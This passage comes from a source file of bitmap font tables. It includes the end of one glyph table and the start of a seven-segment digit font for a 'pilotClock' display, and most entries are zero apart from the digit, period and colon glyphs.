[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Y'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Z'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '['
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # backslash
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ']'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '^'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '_'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '`'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'a'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'b'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'c'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'd'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'e'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'f'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'g'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'h'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'i'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'j'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'k'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'l'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'm'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'n'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'o'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'p'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'q'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'r'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 's'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 't'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'u'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'v'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'w'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'x'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'y'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'z'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '{'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '|'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '}'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '~'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x7F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x80 p
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x81 c
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x82 т
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x83 у
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x84 ф
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x85 x
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x86 ц
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x87 ч
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x88 ш
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x89 щ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8A ъ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8B ы
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8C ь
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8D э
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8E ю
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8F я
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x90 A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x91 Б
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x92 В
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x93 Г
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x94 Д
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x95 E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x96 Ж
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x97 З
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x98 И
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x99 Й
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9A K
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9B Л
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9C M
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9D H
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9E O
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9F П
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA0 P
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA1 C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA2 T
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA3 У
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA4 Ф
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA5 X
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA6 Ц
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA7 Ч
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA8 Ш
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA9 Щ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAA Ъ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAB Ы
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAC Э
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAD Ь
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAE Ю
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAF Я
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB0 a
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB1 б
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB2 в
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB3 г
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB4 д
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB5 e
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB6 ж
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB7 з
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB8 и
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB9 й
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBA к
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBB л
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBC м
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBD н
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBE o
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBF п
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xED
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFF
]
#: Bit patterns for the pilotClock Digits, 7-segment style, font height = 10
DIGITS_FONT_SEG = [
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x00
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x01
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x02
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x03
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x04
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x05
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x06
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x07
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x08
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x09
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x10
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x11
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x12
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x13
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x14
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x15
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x16
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x17
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x18
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x19
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ' '
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '!'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '"'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '#'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '$'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '%'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '&'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '''
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '('
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ')'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '*'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '+'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ','
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '-'
[0x0000, 0x0000, 0x0200, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '.'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '/'
[0x01EE, 0x0201, 0x0201, 0x0201, 0x0201, 0x01EE, 0x0000, 0x0000], # '0'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x01EE, 0x0000, 0x0000], # '1'
[0x01E0, 0x0211, 0x0211, 0x0211, 0x0211, 0x000E, 0x0000, 0x0000], # '2'
[0x0000, 0x0211, 0x0211, 0x0211, 0x0211, 0x01EE, 0x0000, 0x0000], # '3'
[0x000E, 0x0010, 0x0010, 0x0010, 0x0010, 0x01EE, 0x0000, 0x0000], # '4'
[0x000E, 0x0211, 0x0211, 0x0211, 0x0211, 0x01E0, 0x0000, 0x0000], # '5'
[0x01EE, 0x0211, 0x0211, 0x0211, 0x0211, 0x01E0, 0x0000, 0x0000], # '6'
[0x0000, 0x0001, 0x0001, 0x0001, 0x0001, 0x01EE, 0x0000, 0x0000], # '7'
[0x01EE, 0x0211, 0x0211, 0x0211, 0x0211, 0x01EE, 0x0000, 0x0000], # '8'
[0x000E, 0x0211, 0x0211, 0x0211, 0x0211, 0x01EE, 0x0000, 0x0000], # '9'
[0x0000, 0x0000, 0x0084, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ':'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ';'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '<'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '='
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '>'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '?'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '@'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'A'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'B'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'C'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'D'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'E'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'F'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'G'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'H'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'I'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'J'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'K'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'L'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'M'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'N'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'O'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'P'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Q'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'R'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'S'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'T'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'U'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'V'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'W'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'X'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Y'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Z'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '['
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # backslash
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ']'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '^'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '_'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '`'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'a'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'b'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'c'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'd'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'e'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'f'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'g'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'h'
